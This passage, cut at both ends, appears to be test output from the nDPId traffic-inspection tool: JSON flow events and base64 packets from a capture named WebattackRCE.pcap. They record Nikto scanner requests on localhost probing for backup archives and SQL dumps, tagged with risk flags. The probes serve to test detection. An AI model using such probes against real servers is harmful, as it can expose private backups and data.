{"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":385,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":385,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277283,"flow_last_seen":1576420277283,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277283,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50314,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":385,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":385,"flow_packet_id":1,"flow_last_seen":1576420277283,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"thread_ts_msec":1576420277283,"pkt":"AAAAAAAAAAAAAAAACABFAADDBOlAAEAGN0p\/AAABfwAAAcSKH5Dv6jxQN18efIAYAED+twAAAQEICp1m\/UudZv1LR0VUIC8xMjcuMC4wLmVnZyBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":385,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":385,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277283,"flow_last_seen":1576420277283,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277283,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50314,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":386,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":386,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277284,"flow_last_seen":1576420277284,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277284,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50316,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":386,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":386,"flow_packet_id":1,"flow_last_seen":1576420277284,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"thread_ts_msec":1576420277284,"pkt":"AAAAAAAAAAAAAAAACABFAADDCzNAAEAGMQB\/AAABfwAAAcSMH5CEzzOZEWOd+IAYAED+twAAAQEICp1m\/UydZv1MR0VUIC8xMjcuMC4wLmVnZyBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} -01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":386,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":386,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277284,"flow_last_seen":1576420277284,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277284,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50316,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":387,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":387,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277286,"flow_last_seen":1576420277286,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277286,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50318,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00662{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":387,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":387,"flow_packet_id":1,"flow_last_seen":1576420277286,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420277286,"pkt":"AAAAAAAAAAAAAAAACABFAAC9CzBAAEAGMQl\/AAABfwAAAcSOH5AKIDOIyoTTQIAYAED+sQAAAQEICp1m\/U2dZv1NR0VUIC8xLmVnZyBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} -01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":387,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":387,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277286,"flow_last_seen":1576420277286,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277286,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50318,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":388,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":388,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277288,"flow_last_seen":1576420277288,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277288,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50320,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00663{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":388,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":388,"flow_packet_id":1,"flow_last_seen":1576420277288,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420277288,"pkt":"AAAAAAAAAAAAAAAACABFAAC9JlVAAEAGFeR\/AAABfwAAAcSQH5Clfx76D\/AiGIAYAED+sQAAAQEICp1m\/VCdZv1QR0VUIC8xLmVnZyBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} -01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":388,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":388,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277288,"flow_last_seen":1576420277288,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277288,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50320,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":389,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":389,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277291,"flow_last_seen":1576420277291,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277291,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50322,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":389,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":389,"flow_packet_id":1,"flow_last_seen":1576420277291,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277291,"pkt":"AAAAAAAAAAAAAAAACABFAADCVkJAAEAG5fF\/AAABfwAAAcSSH5BxEW7rgO+zGYAYAED+tgAAAQEICp1m\/VOdZv1SR0VUIC8xMjcwMDEudGd6IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":389,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":389,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277291,"flow_last_seen":1576420277291,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277291,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50322,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":390,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":390,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277292,"flow_last_seen":1576420277292,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277292,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50324,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":390,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":390,"flow_packet_id":1,"flow_last_seen":1576420277292,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277292,"pkt":"AAAAAAAAAAAAAAAACABFAADC9VNAAEAGRuB\/AAABfwAAAcSUH5A3Js37LMn8joAYAED+tgAAAQEICp1m\/VSdZv1UR0VUIC8xMjcwMDEudGd6IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":390,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":390,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277292,"flow_last_seen":1576420277292,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277292,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50324,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":391,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":391,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277293,"flow_last_seen":1576420277293,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277293,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50326,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":391,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":391,"flow_packet_id":1,"flow_last_seen":1576420277293,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277293,"pkt":"AAAAAAAAAAAAAAAACABFAADB0lRAAEAGaeB\/AAABfwAAAcSWH5D4eer6AmSqt4AYAED+tQAAAQEICp1m\/VWdZv1VR0VUIC8xLnRhci5iejIgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":391,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":391,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277293,"flow_last_seen":1576420277293,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277293,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50326,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":392,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":392,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277295,"flow_last_seen":1576420277295,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277295,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50328,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":392,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":392,"flow_packet_id":1,"flow_last_seen":1576420277295,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277295,"pkt":"AAAAAAAAAAAAAAAACABFAADBgrRAAEAGuYB\/AAABfwAAAcSYH5BqProaPd\/PWYAYAED+tQAAAQEICp1m\/VedZv1XR0VUIC8xLnRhci5iejIgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":392,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":392,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277295,"flow_last_seen":1576420277295,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277295,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50328,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":393,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":393,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277296,"flow_last_seen":1576420277296,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277296,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50330,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":393,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":393,"flow_packet_id":1,"flow_last_seen":1576420277296,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420277296,"pkt":"AAAAAAAAAAAAAAAACABFAADFhERAAEAGt+x\/AAABfwAAAcSaH5DLx7zvpnN3coAYAED+uQAAAQEICp1m\/VidZv1YR0VUIC8xMjcwMDEudGFyLmd6IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":393,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":393,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277296,"flow_last_seen":1576420277296,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277296,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50330,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":394,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":394,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277298,"flow_last_seen":1576420277298,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277298,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50332,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":394,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":394,"flow_packet_id":1,"flow_last_seen":1576420277298,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420277298,"pkt":"AAAAAAAAAAAAAAAACABFAADFkbNAAEAGqn1\/AAABfwAAAcScH5DniakeYsnjE4AYAED+uQAAAQEICp1m\/VqdZv1aR0VUIC8xMjcwMDEudGFyLmd6IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":394,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":394,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277298,"flow_last_seen":1576420277298,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277298,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50332,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":395,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":395,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277299,"flow_last_seen":1576420277299,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277299,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50334,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":395,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":395,"flow_packet_id":1,"flow_last_seen":1576420277299,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420277299,"pkt":"AAAAAAAAAAAAAAAACABFAADATXFAAEAG7sR\/AAABfwAAAcSeH5C5OnXDLQhZdIAYAED+tAAAAQEICp1m\/VudZv1bR0VUIC8xMjcwLnNxbCBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":395,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":395,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277299,"flow_last_seen":1576420277299,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277299,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50334,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": 